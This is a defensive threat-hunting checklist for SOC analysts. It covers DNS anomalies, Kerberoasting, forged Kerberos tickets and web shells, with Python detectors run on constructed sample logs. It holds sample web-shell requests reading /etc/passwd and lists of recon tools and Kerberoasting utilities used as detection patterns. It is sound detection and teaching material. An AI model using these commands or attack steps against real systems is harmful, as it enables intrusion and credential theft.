
DNS Logs Anomaly Hunting Checklist for Security and SOC Analysts



Check for hosts with a high volume of uncommon record types (TXT, NULL, CNAME, etc.)


• Command-and-control channels and DNS tunnels often carry tasking and data in record types such as TXT, NULL and CNAME, because their response payloads can hold arbitrary attacker-supplied text. Malware does not execute from a DNS record; it reads instructions from one, so a workstation that suddenly issues hundreds of TXT queries deserves a look.


• Explore top-level domains (TLDs such as .xyz, .me, .biz, etc.) and the country-code TLDs of geographical regions in which your organization does not regularly operate.


• The proliferation of TLDs has made it easier for attackers to keep adding new domains to their infrastructure to evade threat-intel lists, and to register doppelganger domains for common websites.


• Outbound requests for TLDs of geographical regions outside your organization's points of presence should be considered suspicious and reviewed, especially regions synonymous with cybercrime and anonymization services. Keep the baseline per business unit: a team that works with partners in a region will legitimately resolve that region's TLD.


• Aggregate and filter DNS logs on the response code NXDOMAIN (domain does not exist) to find hosts with a high volume of DNS resolution failures.


• There are many benign reasons for failed DNS queries; an abnormally high volume, however, can be a strong indicator of threat activity. For example, malware using a domain generation algorithm (DGA) cycles through generated domains until one resolves. Since most of the requested domains will not exist, it produces a burst of NXDOMAIN responses. Abnormal NXDOMAIN volume can also reveal hosts still calling back to malicious domains that have been taken down or sinkholed.


• Look for hosts with a high volume of DNS requests for many different subdomains of a single parent domain.


• A common way to move data over DNS is to put it in the query name itself, as one or more subdomain labels (commonly Base64- or hex-encoded), so that the attacker's authoritative server receives it. Many distinct, odd-looking subdomains of one domain from one host is the signature of this technique.


• Identify suspicious requests by reviewing queries for domains that are abnormally long, or whose labels have high character entropy.


• Hunting for abnormally long queries, or for a high volume of them from one host, can surface encoded data hidden in query names as well as DGA domains, whose labels look random rather than like words.


• Where the DNS log records the requesting process (for example Sysmon Event ID 22 on Windows), review process names for unusually named processes, or for processes that are not normally seen generating DNS requests at all.


• Attackers can simply register new domains to evade threat-intel lists. Enriching queries with domain age (WHOIS creation date or a domain-age feed) and flagging newly registered domains is an easy way to surface suspicious activity.


• Fast flux (DNS fluxing) is a technique attackers use to hide the real phishing or malware host behind a constantly changing set of compromised machines acting as proxies. To make it work, the DNS time to live (TTL) is set very low (around 5 minutes) so that record changes propagate quickly. Because the answers keep changing, the real source is hard to identify and take down. Two ways to hunt for it: queries whose answers carry a TTL under 5-10 minutes, and a single domain returning many different IP addresses over a short period. CDNs also use low TTLs, so treat this as a pivot rather than a verdict.


• Zone transfers (AXFR/IXFR) run over TCP port 53 and should only be allowed between primary and secondary DNS servers. A zone transfer to or from an external IP or domain should raise a high-severity alert. Do not simply block all TCP/53: large responses (DNSSEC, truncated UDP replies) legitimately fall back to TCP.


• Internal hosts should resolve only through the organization's own DNS servers. Direct port-53 traffic (or DNS-over-HTTPS to public resolvers) from endpoints to unusual external destinations bypasses logging and filtering and often indicates malicious or policy-evading traffic.
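The checklist above as one pass over a query log, as an added example that is not part of the original post. It works on constructed sample lines (client, record type, name, response code, answer TTL), and every threshold (three NXDOMAINs, three uncommon-type queries, three subdomains per parent, 40-character names, 3.8 bits of entropy, TTL under 300 s) and the risky-TLD list are assumptions to tune against a 30-day baseline of your own resolvers:

```python
import math
import re
from collections import Counter, defaultdict

# Constructed sample DNS query log (made up for this example), one query per line:
# client  qtype  qname  rcode  answer_ttl
SAMPLE_LOG = """\
10.0.0.5 A www.example.com NOERROR 300
10.0.0.5 A cdn.example.net NOERROR 600
10.0.0.9 TXT cmd.c2-staging.xyz NOERROR 60
10.0.0.9 TXT cmd.c2-staging.xyz NOERROR 60
10.0.0.9 TXT cmd.c2-staging.xyz NOERROR 60
10.0.0.9 A aGVsbG8gd29ybGQgdGhpcyBpcw.tunnel.example.org NOERROR 1
10.0.0.9 A dGhpcyBpcyBhIHRlc3Qgb2YgdGhl.tunnel.example.org NOERROR 1
10.0.0.9 A c29tZSBtb3JlIGRhdGEgZ29lcw.tunnel.example.org NOERROR 1
10.0.0.7 A kqzxvbnmpqwerty.com NXDOMAIN 0
10.0.0.7 A plmkoijnbhuygvt.net NXDOMAIN 0
10.0.0.7 A zaqwsxcderfvbgt.info NXDOMAIN 0
10.0.0.7 A mnbvcxzlkjhgfds.com NXDOMAIN 0
10.0.0.3 A login.example-bank.ru NOERROR 120
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\d+)$")
UNCOMMON_TYPES = frozenset({"TXT", "NULL", "CNAME"})
# Assumed watch-list: TLDs this (fictional) organization never does business with.
RISKY_TLDS = frozenset({"xyz", "top", "biz", "me", "ru"})


def shannon_entropy(text):
    """Bits per character. Word-like names score around 3, DGA/base64 labels 4 and up."""
    n = len(text)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def parse_log(text):
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip blank or malformed lines instead of aborting the hunt
        client, qtype, qname, rcode, ttl = m.groups()
        records.append({"client": client, "qtype": qtype.upper(),
                        "qname": qname.lower().rstrip("."),
                        "rcode": rcode.upper(), "ttl": int(ttl)})
    return records


def parent_domain(qname):
    """Last two labels. Use a public-suffix list in production for co.uk-style TLDs."""
    return ".".join(qname.split(".")[-2:])


def hunt(records, nxdomain_min=3, uncommon_min=3, fanout_min=3,
         long_len=40, entropy_min=3.8, low_ttl=300):
    nx = Counter(r["client"] for r in records if r["rcode"] == "NXDOMAIN")
    uncommon = Counter(r["client"] for r in records if r["qtype"] in UNCOMMON_TYPES)
    fanout = defaultdict(lambda: defaultdict(set))  # client -> parent -> distinct names
    for r in records:
        fanout[r["client"]][parent_domain(r["qname"])].add(r["qname"])
    return {
        # DGA failure storms, or callbacks to expired/sinkholed domains
        "nxdomain_hosts": {h: c for h, c in nx.items() if c >= nxdomain_min},
        # TXT/NULL/CNAME volume per host (C2 tasking, tunnels)
        "uncommon_type_hosts": {h: c for h, c in uncommon.items() if c >= uncommon_min},
        # many distinct subdomains of one parent from one host (data in the query name)
        "subdomain_fanout": {(h, p): len(names) for h, parents in fanout.items()
                             for p, names in parents.items() if len(names) >= fanout_min},
        # encoded payloads and DGA labels are long and/or high-entropy
        "long_or_random": sorted({r["qname"] for r in records
                                  if len(r["qname"]) >= long_len
                                  or shannon_entropy(r["qname"]) >= entropy_min}),
        "risky_tld": sorted({r["qname"] for r in records
                             if r["qname"].rsplit(".", 1)[-1] in RISKY_TLDS}),
        # fast-flux hint; CDNs also use short TTLs, so this is a pivot, not a verdict
        "low_ttl": sorted({r["qname"] for r in records
                           if r["rcode"] == "NOERROR" and 0 < r["ttl"] < low_ttl}),
    }


if __name__ == "__main__":
    for name, hits in hunt(parse_log(SAMPLE_LOG)).items():
        print(f"{name}: {hits}")
```

Run it over a day of resolver logs and read the findings as pivots: a host that appears under several headings at once (NXDOMAIN storm plus high-entropy names, or TXT volume plus subdomain fan-out) is the one to pull for triage.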

Kerberoasting Attack and Detection


Kerberoasting is a common attack used by malicious actors once they have a foothold on an organization's internal network and a domain account. It lets an attacker escalate privileges by recovering the passwords of service accounts on the domain, which are often old, long-lived and over-privileged.



Key Points

• With Kerberoasting, an attacker requests service tickets from Active Directory and cracks them offline. It works because a service ticket is encrypted with a key derived from the service account's password (for RC4-HMAC, the NT hash itself), so a weak password falls to a dictionary or mask attack.

  • Kerberoasting is effective because it needs no domain administrator credentials: any authenticated domain user may request a ticket for any SPN, and the attacker never has to contact the service host. The only traffic is an ordinary TGS-REQ to the domain controller, which is why detection has to come from Kerberos event logging rather than from the target.


Detecting Kerberoasting:

  • Event ID 4769 (A Kerberos service ticket was requested) with Ticket Encryption Type 0x17 (RC4-HMAC) or 0x18 (RC4-HMAC-EXP) and Ticket Options 0x40810000. Modern clients request AES (0x11/0x12) by default, so RC4 tickets for accounts that support AES stand out; an attacker can ask for AES tickets instead, so do not rely on the encryption type alone.
  • Stack 4769 events by Account Name and count distinct Service Names: one account requesting tickets for many SPNs within minutes is the bulk-roast pattern. Exclude Service Name krbtgt and computer accounts (ending in $) to cut noise.
  • Event ID 4768 records TGT (authentication ticket) requests, not service tickets, and is not by itself a Kerberoasting indicator.


Elements of a Kerberoasting Attack


Here is how a Kerberoasting attack works in practice:


  • To begin with, an attacker compromises the account of a domain user. The user need not have elevated or administrator privileges. The attacker authenticates to the domain.
  • Once authenticated, the user receives a ticket-granting ticket (TGT) from the Kerberos key distribution center (KDC), encrypted with the key of the KRBTGT account in Active Directory.
  • Next, the attacker requests a service ticket for the SPN they wish to compromise. The domain controller looks up the SPN in the Active Directory database and issues a TGS ticket encrypted with the service account's long-term key, which is derived from that account's password. Only the service and the domain controller can decrypt it, because they are the only two parties that share the secret.
  • The domain controller returns the service ticket to the user. In normal use the ticket is presented to the service, which decrypts it and checks the user's permissions; the attacker instead keeps the ticket (it arrives in the TGS-REP and is also cached in memory) and cracks it offline. Nothing is ever sent to the service.
  • Tools such as Impacket (GetUserSPNs.py), PowerSploit (Invoke-Kerberoast) and Empire automate the process: they request the service tickets and emit crackable hashes in formats accepted by John the Ripper and Hashcat, which recover the plaintext password when it is weak.
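The detection described above in code, as an added example that is not part of the original post: it stacks Event ID 4769 records by requesting account and flags any account that asked for several distinct SPNs in one window. The sample events are constructed; field names follow the Security log (TargetUserName, ServiceName, TicketEncryptionType, TicketOptions, IpAddress), and the thresholds (three SPNs in ten minutes) are assumptions to tune:

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_TYPES = {"0x17", "0x18"}   # RC4-HMAC and RC4-HMAC-EXP: keyed straight from the NT hash
ROAST_OPTIONS = "0x40810000"    # Forwardable | Renewable | Canonicalize, as roasting tools request


def _ev(time, user, svc, enc, ip):
    return {"time": time, "TargetUserName": user, "ServiceName": svc,
            "TicketEncryptionType": enc, "TicketOptions": ROAST_OPTIONS, "IpAddress": ip}


# Constructed sample 4769 events (made up for this example).
SAMPLE_4769 = [
    _ev("2024-05-01T09:00:01", "jdoe@CORP.LOCAL", "svc_sql", "0x17", "::ffff:10.0.0.21"),
    _ev("2024-05-01T09:00:02", "jdoe@CORP.LOCAL", "svc_web", "0x17", "::ffff:10.0.0.21"),
    _ev("2024-05-01T09:00:02", "jdoe@CORP.LOCAL", "svc_backup", "0x17", "::ffff:10.0.0.21"),
    _ev("2024-05-01T09:00:03", "jdoe@CORP.LOCAL", "svc_iis", "0x17", "::ffff:10.0.0.21"),
    # normal traffic: an AES ticket for a computer account, and the TGT itself
    _ev("2024-05-01T09:01:00", "abrown@CORP.LOCAL", "FILESRV01$", "0x12", "::ffff:10.0.0.33"),
    _ev("2024-05-01T09:01:05", "jdoe@CORP.LOCAL", "krbtgt", "0x12", "::ffff:10.0.0.21"),
    # one RC4 ticket from a legacy application: real, but a single SPN is not a roast
    _ev("2024-05-01T09:02:00", "svc_legacy@CORP.LOCAL", "svc_sql", "0x17", "::ffff:10.0.0.50"),
]


def is_roast_request(ev, require_rc4=True):
    """True for one 4769 that looks like a roasting request. Pass require_rc4=False when
    hunting AES-only roasting; the fan-out check in find_kerberoasting is then the only
    signal, so expect more noise."""
    svc = ev["ServiceName"]
    if svc.lower() == "krbtgt" or svc.endswith("$"):
        return False  # TGT renewals and computer-account tickets are noise
    if ev.get("TicketOptions") != ROAST_OPTIONS:
        return False
    return (not require_rc4) or ev.get("TicketEncryptionType") in RC4_TYPES


def find_kerberoasting(events, min_services=3, window_minutes=10, require_rc4=True):
    """Stack roast-looking requests per requesting account and report every account that
    requested min_services distinct SPNs inside one sliding window."""
    by_user = defaultdict(list)
    for ev in events:
        if is_roast_request(ev, require_rc4):
            by_user[ev["TargetUserName"]].append(
                (datetime.fromisoformat(ev["time"]), ev["ServiceName"], ev["IpAddress"]))
    window = timedelta(minutes=window_minutes)
    hits = {}
    for user, reqs in by_user.items():
        reqs.sort()
        for i, (t0, _, ip) in enumerate(reqs):
            services = {svc for t, svc, _ in reqs[i:] if t - t0 <= window}
            if len(services) >= min_services:
                hits[user] = {"services": sorted(services), "source": ip,
                              "first_seen": t0.isoformat()}
                break
    return hits


if __name__ == "__main__":
    for user, hit in find_kerberoasting(SAMPLE_4769).items():
        print(f"{user} from {hit['source']} roasted {hit['services']} starting {hit['first_seen']}")
```

The single RC4 request from the legacy account is deliberately left unflagged: the encryption type alone produces false positives wherever an old application still negotiates RC4, and the fan-out across SPNs is what separates an attacker from a misconfiguration.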



Finding Golden and Silver Tickets


Purpose: Identify suspicious TGT (Golden) and TGS (Silver) tickets by comparing the MaxTicketAge and MaxServiceAge values from the domain Kerberos policy (defaults 10 hours and 600 minutes) to the difference between the StartTime and EndTime of each cached ticket. Forging tools default to very long lifetimes (Mimikatz issues 10-year tickets), which no legitimate KDC would grant.

Data Required: Remote access to collect suspicious tickets, OR a scheduled task that writes possible bad tickets to the Application event log for log/SIEM review.

Collection Considerations: Consider running local scripts and collecting the Application event log rather than a network scan, to reduce noise.

Analysis Techniques: Comparative time analysis of domain policy vs. cached tickets. A forger who sets the lifetime to match policy defeats this check, so combine it with the field anomalies below.


Identify suspicious TGT (Golden) and TGS (Silver) tickets  


  • Event ID 4624 (Account Logon): the Account Domain field is the DOMAIN FQDN when it should be DOMAIN, or is blank.
  • Event ID 4672 (Admin Logon): the Account Domain field is blank when it should be DOMAIN.
  • Event ID 4768 (Kerberos TGT Request): the Account Domain field is the DOMAIN FQDN, or blank, when it should be DOMAIN.
  • In any of these events, the Account Name is a different account from the one the Security ID resolves to (a forged PAC carrying another user's SID).

These field artifacts come from the way forging tools fill in the ticket; they are cheap to check, but a careful attacker can avoid them, which is why the lifetime comparison is the primary test.
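Both checks from this section in code, as an added example that is not part of the original post: a parser for text in the shape of `klist` output that flags tickets living longer than policy allows, plus the 4624/4672/4768 field checks. The klist text, the SID-to-name map and the policy defaults (10 h MaxTicketAge, 600 min MaxServiceAge) are constructed or assumed; substitute the values from your Default Domain Policy:

```python
import re
from datetime import datetime, timedelta

# Constructed text in the shape of `klist` output on a Windows host (values made up).
SAMPLE_KLIST = """\
Current LogonId is 0:0x3e7a1

Cached Tickets: (2)

#0>     Client: jdoe @ CORP.LOCAL
        Server: krbtgt/CORP.LOCAL @ CORP.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Start Time: 5/1/2024 9:00:00 (local)
        End Time:   5/1/2024 19:00:00 (local)
        Renew Time: 5/8/2024 9:00:00 (local)

#1>     Client: Administrator @ CORP.LOCAL
        Server: krbtgt/CORP.LOCAL @ CORP.LOCAL
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Start Time: 5/1/2024 9:05:00 (local)
        End Time:   4/29/2034 9:05:00 (local)
        Renew Time: 4/29/2034 9:05:00 (local)
"""

TICKET_HDR = re.compile(r"^#\d+>")
FIELD = re.compile(r"^\s*(Client|Server|Start Time|End Time|Renew Time):\s*(.+?)\s*(?:\(local\))?\s*$")
TIME_FMT = "%m/%d/%Y %H:%M:%S"


def parse_klist(text):
    tickets, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if TICKET_HDR.match(line):          # "#0>" starts a ticket; Client: is on the same line
            cur = {}
            tickets.append(cur)
            line = TICKET_HDR.sub("", line, count=1)
        m = FIELD.match(line)
        if m and cur is not None:
            cur[m.group(1)] = m.group(2)
    return tickets


def ticket_lifetime(ticket):
    start = datetime.strptime(ticket["Start Time"], TIME_FMT)
    end = datetime.strptime(ticket["End Time"], TIME_FMT)
    return end - start


def suspicious_tickets(klist_text, max_ticket_age=timedelta(hours=10),
                       max_service_age=timedelta(minutes=600)):
    """Tickets whose lifetime exceeds policy. krbtgt/ tickets are TGTs (Golden if forged);
    anything else is a service ticket (Silver if forged)."""
    out = []
    for t in parse_klist(klist_text):
        is_tgt = t.get("Server", "").lower().startswith("krbtgt/")
        life = ticket_lifetime(t)
        if life > (max_ticket_age if is_tgt else max_service_age):
            out.append({"client": t.get("Client"), "server": t["Server"],
                        "kind": "Golden (TGT)" if is_tgt else "Silver (TGS)",
                        "lifetime_hours": life.total_seconds() / 3600})
    return out


# Constructed SID-to-name map standing in for an AD lookup.
SID_NAMES = {"S-1-5-21-1111-2222-3333-500": "Administrator",
             "S-1-5-21-1111-2222-3333-1105": "jdoe"}


def suspicious_logon_event(ev, expected_domain="CORP"):
    """Field anomalies from the checklist above for a 4624/4672/4768-style event with
    AccountName, AccountDomain and SecurityId. Forged tickets built with correct fields
    will not trip these, so pair them with suspicious_tickets()."""
    reasons = []
    domain = ev.get("AccountDomain", "")
    if domain == "":
        reasons.append("Account Domain blank")
    elif domain.upper() != expected_domain.upper():
        reasons.append("Account Domain is FQDN or foreign: " + domain)
    expected_name = SID_NAMES.get(ev.get("SecurityId", ""))
    if expected_name and expected_name.lower() != ev.get("AccountName", "").lower():
        reasons.append("Account Name differs from Security ID")
    return reasons


if __name__ == "__main__":
    for hit in suspicious_tickets(SAMPLE_KLIST):
        print(f"{hit['kind']}: {hit['client']} -> {hit['server']} lives {hit['lifetime_hours']:.0f} h")
```

The normal TGT in the sample lives exactly 10 hours and is not reported; the second one lives ten years and is. A scheduled task that runs `klist` under each interactive session and writes this verdict to the Application log is the collection method the section above recommends.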




  • BloodHound is an Active Directory (AD) reconnaissance tool.
  • Its collector writes results as JSON files covering users, computers, groups and GPOs, and can bundle them into a ZIP archive; those files on disk, and the burst of LDAP queries and SMB session enumeration that produces them, are what to hunt for.
  • Hunt for suspicious process execution via services.exe.
  • Hunt for suspicious process injection.

Hacking methodology, ATT&CK tactics, kill chain and incident response phases

Several step sequences are in common use in the industry; the most common ones are listed below.

 HACKING Methodology (Steps) 

Footprinting (whois, nslookup) » 

Scanning (Nmap, fping) » 

Enumeration (DumpACL, showmount, Legion, rpcinfo) » 

Gaining Access (tcpdump) »

Escalating Privilege (John the Ripper, getadmin) »

Pilfering (rhosts, user data, config files, registry) » 

Covering Tracks (zap, rootkits) »

Creating Backdoors (cron, at, startup folder, keylogger, RDP) »

Denial of Service (synk4, ping of death). 




MITRE ATT&CK Enterprise tactics:

Reconnaissance » 

Resource Development » 

Initial Access » Execution »

 Persistence »

 Privilege Escalation » 

Defense Evasion » 

Credential Access » 

Discovery »

 Lateral Movement »

 Collection »

Command and Control »

Exfiltration »

Impact.







Cyber Kill Chain (Lockheed Martin):

Reconnaissance » 

Weaponization » 

Delivery » 

Exploitation »

Installation »

Command and Control » 

Actions on Objectives.


NIST Cybersecurity Framework functions (often quoted as incident response phases, but they describe the whole security program): 

Identify »  Protect »  Detect »  Respond »  Recover. 

SANS Incident Response:

 Preparation »  Identification »  Containment »  Eradication »  Recovery »  Lessons Learned

Web shells: detecting them and hardening servers against them

Web shells and the challenges in detecting them 

Web shells can be written in any of the languages popular for web applications. Within each language there are several ways to execute arbitrary commands and several channels for arbitrary attacker input: the query string, the POST body, cookies, the User-Agent string or any other header or parameter exchanged between client and server.
When analyzing a script, it is important to use contextual clues. For example, a scheduled task called "Update Google" that downloads and runs code from a suspicious website should be inspected more closely.

With web shells, context is harder to use because it does not exist until the shell is used. In a minimal shell that passes a request parameter straight to system(), the most useful clues, "system" and "cat /etc/passwd", are split: "system" is the only thing in the file, and "cat /etc/passwd" appears only in the attacker's request, so the file on its own looks almost innocuous.

Another challenge is establishing intent. A harmless-seeming script can be malicious depending on how it is used. And when attackers can upload arbitrary files into the web directory, they can drop a full-featured web shell that allows arbitrary code execution.

File-upload web shells are simple, lightweight and easily overlooked because they cannot execute attacker commands on their own; they can only write files, such as a full-featured web shell, onto the server. Because of their simplicity they are hard to detect and easy to dismiss as benign, so attackers often use them for persistence or in the early stages of an intrusion.

Finally, attackers hide web shells in non-executable file formats such as media files. A web server configured to execute server-side code in the upload directory makes this worse, because it will parse a "photo" for script tags and run whatever it finds. When the file is opened on a workstation it is a harmless image; when a browser requests it from the server, the embedded code executes server side.

These detection challenges contribute to the growing popularity of web shells as an attack tool. We constantly monitor how these evasive threats are used in cyber attacks, and we continue to improve protections.

Web shell: Finding Web Shells

Purpose: Identify web shells (stand-alone, or injected into an existing page)

Data Required: Web server logs (Apache, IIS, etc.)

Collection Considerations: Collect from all web servers, and ensure that request parameters are collected.

POST data should be collected, because a well-built shell takes its commands in the request body rather than the query string:

• For Apache consider using mod_security or mod_dumpio

• For IIS use Failed Request Tracing / Custom Logging

Analysis Techniques:

Look for parameters passed to image or other static files (e.g., /bad.png?zz=ls), which have no business taking input.


Web log things to notice

    • User-Agent is rare

    • User-Agent is new

    • Domain is rare

    • Domain is new

    • High frequency of HTTP connections from one source

    • URI is the same on every request

    • URI varies but its length is constant

    • Domain varies but its length is constant

    • Missing referrer

    • Missing or identical referrer across multiple URIs on a single destination
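The web-log checks from the two lists above run over combined-format access log lines, as an added example that is not part of the original post. The log lines are constructed (one browsing session, one client driving /uploads/bad.png with query-string commands, one client fetching same-length random URIs); "rare" is defined here as a User-Agent seen from a single client, and the other thresholds are assumptions to tune against a month of real traffic:

```python
import re
from collections import Counter, defaultdict

# Constructed Apache/NGINX combined-format lines (made up for this example).
SAMPLE_ACCESS_LOG = """\
198.51.100.7 - - [01/May/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 3120 "-" "Mozilla/5.0 (Windows NT 10.0) Firefox/125.0"
198.51.100.7 - - [01/May/2024:10:00:03 +0000] "GET /static/site.css HTTP/1.1" 200 810 "https://www.example.com/" "Mozilla/5.0 (Windows NT 10.0) Firefox/125.0"
198.51.100.7 - - [01/May/2024:10:00:04 +0000] "GET /static/logo.png HTTP/1.1" 200 5120 "https://www.example.com/" "Mozilla/5.0 (Windows NT 10.0) Firefox/125.0"
203.0.113.9 - - [01/May/2024:10:05:10 +0000] "GET /uploads/bad.png?zz=ls HTTP/1.1" 200 612 "-" "python-requests/2.31.0"
203.0.113.9 - - [01/May/2024:10:05:11 +0000] "POST /uploads/bad.png HTTP/1.1" 200 1984 "-" "python-requests/2.31.0"
203.0.113.9 - - [01/May/2024:10:05:12 +0000] "GET /uploads/bad.png?zz=cat+/etc/passwd HTTP/1.1" 200 2201 "-" "python-requests/2.31.0"
192.0.2.44 - - [01/May/2024:10:07:00 +0000] "GET /c/a7f3k2q9 HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows NT 10.0) Firefox/125.0"
192.0.2.44 - - [01/May/2024:10:07:01 +0000] "GET /c/p0m4x8z1 HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows NT 10.0) Firefox/125.0"
192.0.2.44 - - [01/May/2024:10:07:02 +0000] "GET /c/qq81lm3n HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows NT 10.0) Firefox/125.0"
"""

CLF_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+) "([^"]*)" "([^"]*)"$')
STATIC_EXT = {"png", "jpg", "jpeg", "gif", "ico", "css", "js", "svg", "woff"}


def parse_access_log(text):
    records = []
    for line in text.splitlines():
        m = CLF_RE.match(line.strip())
        if not m:
            continue
        client, ts, method, uri, status, size, referer, ua = m.groups()
        records.append({"client": client, "time": ts, "method": method.upper(), "uri": uri,
                        "status": int(status), "referer": referer, "ua": ua})
    return records


def web_shell_findings(records, max_ua_clients=1, min_same_len=3, high_freq=50):
    ua_clients = defaultdict(set)       # User-Agent -> clients that sent it
    uris_by_client = defaultdict(set)   # client -> distinct URIs
    requests_by_client = Counter()
    params_to_static, missing_ref_posts = [], []
    for r in records:
        ua_clients[r["ua"]].add(r["client"])
        uris_by_client[r["client"]].add(r["uri"])
        requests_by_client[r["client"]] += 1
        path, _, query = r["uri"].partition("?")
        filename = path.rsplit("/", 1)[-1]
        ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
        if ext in STATIC_EXT and query:
            params_to_static.append((r["client"], r["uri"]))  # /bad.png?zz=ls
        if r["method"] == "POST" and r["referer"] in ("", "-"):
            missing_ref_posts.append((r["client"], r["uri"]))  # scripted, not browser-driven
    return {
        "params_to_static": params_to_static,
        "rare_user_agents": {ua: sorted(c) for ua, c in ua_clients.items()
                             if len(c) <= max_ua_clients},
        "missing_referrer_posts": missing_ref_posts,
        # many distinct URIs, all the same length: generated paths, not human navigation
        "constant_length_uris": {c: len(next(iter(u))) for c, u in uris_by_client.items()
                                 if len(u) >= min_same_len and len({len(x) for x in u}) == 1},
        "high_frequency_clients": {c: n for c, n in requests_by_client.items() if n >= high_freq},
    }


if __name__ == "__main__":
    for name, hits in web_shell_findings(parse_access_log(SAMPLE_ACCESS_LOG)).items():
        print(f"{name}: {hits}")
```

Note what the standard combined format cannot give you: the POST to /uploads/bad.png shows up only as a referrer-less POST, because the body that carried the command was never logged. That is the reason the collection notes above insist on mod_dumpio, mod_security or Failed Request Tracing.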



Endpoint detection strategies:

• Look for creation of processes whose parent is the web server (e.g., httpd, w3wp.exe); these come from functions such as:

○ PHP functions like exec(), shell_exec(), system(), passthru(), etc.

○ ASP/ASP.NET constructs like eval() or Process.Start(), etc.

• Look for file additions or changes under the web root (practical only if you have a change management process and deployment schedule, so that 'known good' changes are easy to tell apart), for example using inotify on Linux or FileSystemWatcher in .NET to monitor the web root folder(s) recursively.


Other Notable things:

An IIS worker process (w3wp.exe) running commands like 'net', 'whoami', 'dir', 'cmd.exe' or 'query', to name a few, is typically a strong early indicator of web shell activity.


Look for child processes that the IIS worker process (w3wp.exe), Apache HTTP Server processes (httpd.exe, visualsvnserver.exe), etc. do not normally start (e.g., cmd.exe and powershell.exe). The command shell is often an intermediate step (w3wp.exe -> cmd.exe -> whoami.exe), so look one level further down the tree as well as at direct children.


Look for the follow-on execution that identifies remote-execution and reconnaissance activity (for example "arp", "certutil", "cmd", "echo", "ipconfig", "gpresult", "hostname", "net", "netstat", "nltest", "nslookup", "ping", "powershell", "psexec", "qwinsta", "route", "systeminfo", "tasklist", "wget", "whoami", "wmic", etc.)



Processes and tools commonly seen in web shell follow-on activity:

    - rundll32.exe

    - dllhost.exe

    - net.exe

    - powershell.exe

    - ipconfig.exe

    - CobaltStrike

    - BloodHound

    - nslookup.exe


Example detection, written as a behaviour rule (ATT&CK T1055.012 - Process Injection: Process Hollowing):

    - behavior: rundll32.exe created ~20 instances of dllhost.exe without command-line arguments (a legitimate dllhost.exe launch carries a /Processid:{GUID} argument)

      id: 1669ecb0-3a8a-4858-9efd-23e5c01ad643

      type: Process Created

      process: C:\Windows\System32\dllhost.exe

      parentProcess: C:\Windows\System32\rundll32.exe

Attackers need to execute tools. Look at Windows Event ID 4688 (592 on pre-Vista systems) with command-line auditing enabled. Stack the results and look for outliers; group by execution time and user.
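The endpoint side of the hunt in code, as an added example that is not part of the original post: web-server parents spawning shells or reconnaissance binaries, the rundll32.exe-to-argument-less-dllhost.exe pattern from the behaviour rule above, and a 4688-style stack of (user, image) pairs. The process events are constructed in the shape of Sysmon Event 1 / Event 4688 (parent image, image, command line, user); the threshold of ten hollowing candidates is an assumption:

```python
import re
from collections import Counter

WEB_SERVERS = {"w3wp.exe", "httpd.exe", "apache.exe", "nginx.exe", "php-cgi.exe",
               "tomcat.exe", "visualsvnserver.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "cscript.exe", "wscript.exe"}
RECON = {"arp", "certutil", "cmd", "echo", "ipconfig", "gpresult", "hostname", "net", "net1",
         "netstat", "nltest", "nslookup", "ping", "powershell", "psexec", "qwinsta", "route",
         "systeminfo", "tasklist", "wget", "whoami", "wmic"}
ARGS_RE = re.compile(r'^(?:"[^"]*"|\S+)\s*(.*)$')  # drop the (possibly quoted) image path
SYS32 = r"C:\Windows\System32"


def _event(parent, image, cmdline, user="IIS APPPOOL\\DefaultAppPool"):
    return {"parent": parent, "image": image, "cmdline": cmdline, "user": user}


# Constructed process-creation events (made up for this example).
SAMPLE_PROCESS_EVENTS = [
    _event(SYS32 + r"\inetsrv\w3wp.exe", SYS32 + r"\cmd.exe", "cmd.exe /c whoami"),
    _event(SYS32 + r"\cmd.exe", SYS32 + r"\whoami.exe", "whoami"),
    _event(SYS32 + r"\inetsrv\w3wp.exe", SYS32 + r"\net.exe", "net user /domain"),
    _event(r"C:\Windows\explorer.exe", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
           r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory=Default',
           user="CORP\\jdoe"),
    _event(SYS32 + r"\services.exe", SYS32 + r"\svchost.exe", "svchost.exe -k netsvcs",
           user="NT AUTHORITY\\SYSTEM"),
    _event(SYS32 + r"\svchost.exe", SYS32 + r"\dllhost.exe",
           "dllhost.exe /Processid:{A1B2C3D4-0000-4000-8000-000000000001}", user="CORP\\jdoe"),
] + [_event(SYS32 + r"\rundll32.exe", SYS32 + r"\dllhost.exe", SYS32 + r"\dllhost.exe",
            user="CORP\\jdoe") for _ in range(12)]


def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def has_arguments(cmdline):
    m = ARGS_RE.match(cmdline.strip())
    return bool(m and m.group(1).strip())


def hunt_process_events(events, hollow_min=10):
    webserver_spawned = []
    hollow = Counter()
    stack = Counter()
    for ev in events:
        parent, child = basename(ev["parent"]), basename(ev["image"])
        stack[(ev["user"], child)] += 1
        if parent in WEB_SERVERS and (child in SHELLS or child.rsplit(".", 1)[0] in RECON):
            webserver_spawned.append((parent, child, ev["cmdline"]))
        # COM surrogate launches always carry /Processid:{GUID}; a bare dllhost.exe is a
        # hollowing host. Only the direct parent is visible here; whoami.exe under cmd.exe
        # under w3wp.exe needs grandparent tracking via Sysmon's ParentProcessGuid.
        if child == "dllhost.exe" and not has_arguments(ev["cmdline"]):
            hollow[parent] += 1
    return {
        "webserver_spawned": webserver_spawned,
        "hollowing_candidates": {p: n for p, n in hollow.items() if n >= hollow_min},
        # 4688 stacking: (user, image) pairs seen once are the outliers to eyeball first
        "singletons": sorted(k for k, n in stack.items() if n == 1),
    }


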